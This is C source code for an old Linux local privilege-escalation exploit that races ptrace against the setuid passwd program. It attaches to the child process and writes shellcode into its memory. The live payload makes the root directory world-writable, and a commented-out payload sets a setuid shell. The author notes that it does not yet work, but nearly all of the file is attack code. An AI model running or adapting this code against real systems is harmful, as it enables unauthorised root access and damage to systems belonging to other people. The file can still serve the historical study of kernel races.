1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
|
/*
* ptracing the suid for fun and proffit
*
* 21/03/2001 - tmoggie
*
* exploit DOESN'T WORK yet.. so don't blame me for it :P
* it's an example of the race!
*
* gcc -Wall -o ptrace_expl ptrace_expl.c
*
*/
#include <sys/ptrace.h>
#include <sys/procfs.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <signal.h>
#include <unistd.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <asm/ptrace.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
// chmod 0777 /
char *shellcode = "\xb8\x0f\x00\x00\x00\x68\x2f\x00\x00\x2f\x89\xe3\xb9\xff\x01\x00\x00\xcd\x80";
/* "\x31\xc0\x83\xc0\x17\x31\xdb\xcd\x80\xeb"
"\x30\x5f\x31\xc9\x88\x4f\x17\x88\x4f\x1a"
"\x8d\x5f\x10\x89\x1f\x8d\x47\x18\x89\x47"
"\x04\x8d\x47\x1b\x89\x47\x08\x31\xc0\x89"
"\x47\x0c\x8d\x0f\x8d\x57\x0c\x83\xc0\x0b"
"\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xcb\xff\xff\xff\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x2f\x62\x69\x6e\x2f\x73\x68\x30\x2d\x63"
"\x30"
"chmod 4777 /tmp/xp"; */
long int some_add = 0x08048bc8 ;
void
stat(int pid) {
int i;
char fname[1024];
sprintf(fname,"/proc/%d/status",pid);
i = open(fname,O_RDONLY);
printf("open : %d\n",i);
read(i,fname,sizeof(fname));
close(i);
i=0;
while (fname[i] != '\n') i++;
i++;
while (fname[i]!='\n') i++;
fname[i]='\0';
printf("==================== status ============\n%s\n",fname);
printf("****************************************\n");
}
int main(int argc, char **argv)
{
int pid;
int i,j;
int cnt;
void * p;
struct pt_regs regs;
/*struct elf_prpsinfo proc;*/
if (argc == 1) {
printf("[+] cleaning disk cache, pleas be patient...");
fflush(stdout);
system("cat /usr/bin/* >/dev/null 2>&1");
printf(" [done]\n[+] starting main code\n");
execl(argv[0],argv[0],"daj-mi-qrfa-roota",0);
}
pid = fork();
if (pid == 0) {
i = open("/etc/lilo.conf",O_RDONLY);
p = mmap(0,102400,PROT_READ,MAP_PRIVATE,i,0);
printf("Child exec\n");
execl("/usr/bin/passwd", p, 0);
printf("C aiaiai: %s\n",strerror(errno));
exit(-1);
}
stat(pid);
i = ptrace(PTRACE_ATTACH, pid, 0, 0);
printf("P ATT: %d : %s\n",i,strerror(errno));
if (i != 0) {
printf("P ATT: failed: %s\n",strerror(errno));
exit(-1);
}
i = waitpid(pid,0,0);
i = ptrace(PTRACE_GETREGS,pid,®s,0);
printf("PTRACE_GETREGS returned: %d : %s\n",i,strerror(errno));
stat(pid);
/* printf("eip = 0x%8.8lx\n",regs.eip);
printf("new eip = 0x0%8.8lx\n",some_add);
regs.eip = some_add;
i = ptrace(PTRACE_SETREGS,pid,®s,5);
printf("[+] PTRACE_SETREGS returned: %d : %s\n",i,strerror(errno));
*/
if ( (i = ptrace(PTRACE_POKEUSER, pid, 4*EIP, shellcode)) != 0)
fprintf(stderr, "err. ERROR ptrace_pikeuser\n");
stat(pid);
printf("[+] copy shellcode from P:0x%8.8x to C:0x%8.8lx\n[",
(int)shellcode,some_add);
for (j=0;j<strlen(shellcode);j+=4) {
i = ptrace(PTRACE_POKETEXT,pid,some_add+j,*(int*)(shellcode+j));
printf(".");
if (i != 0) {
printf("\n[-] PTRACE_POKETEXT returned: %d : %s\n",i,strerror(errno));
printf("exiting\n");
exit(-1);
}
}
printf("]\n");
stat(pid);
i = ptrace(PTRACE_DETACH, pid, 0, 0);
stat(pid);
exit(0); /* gnu coding standarts :> */
return(0);
}
|
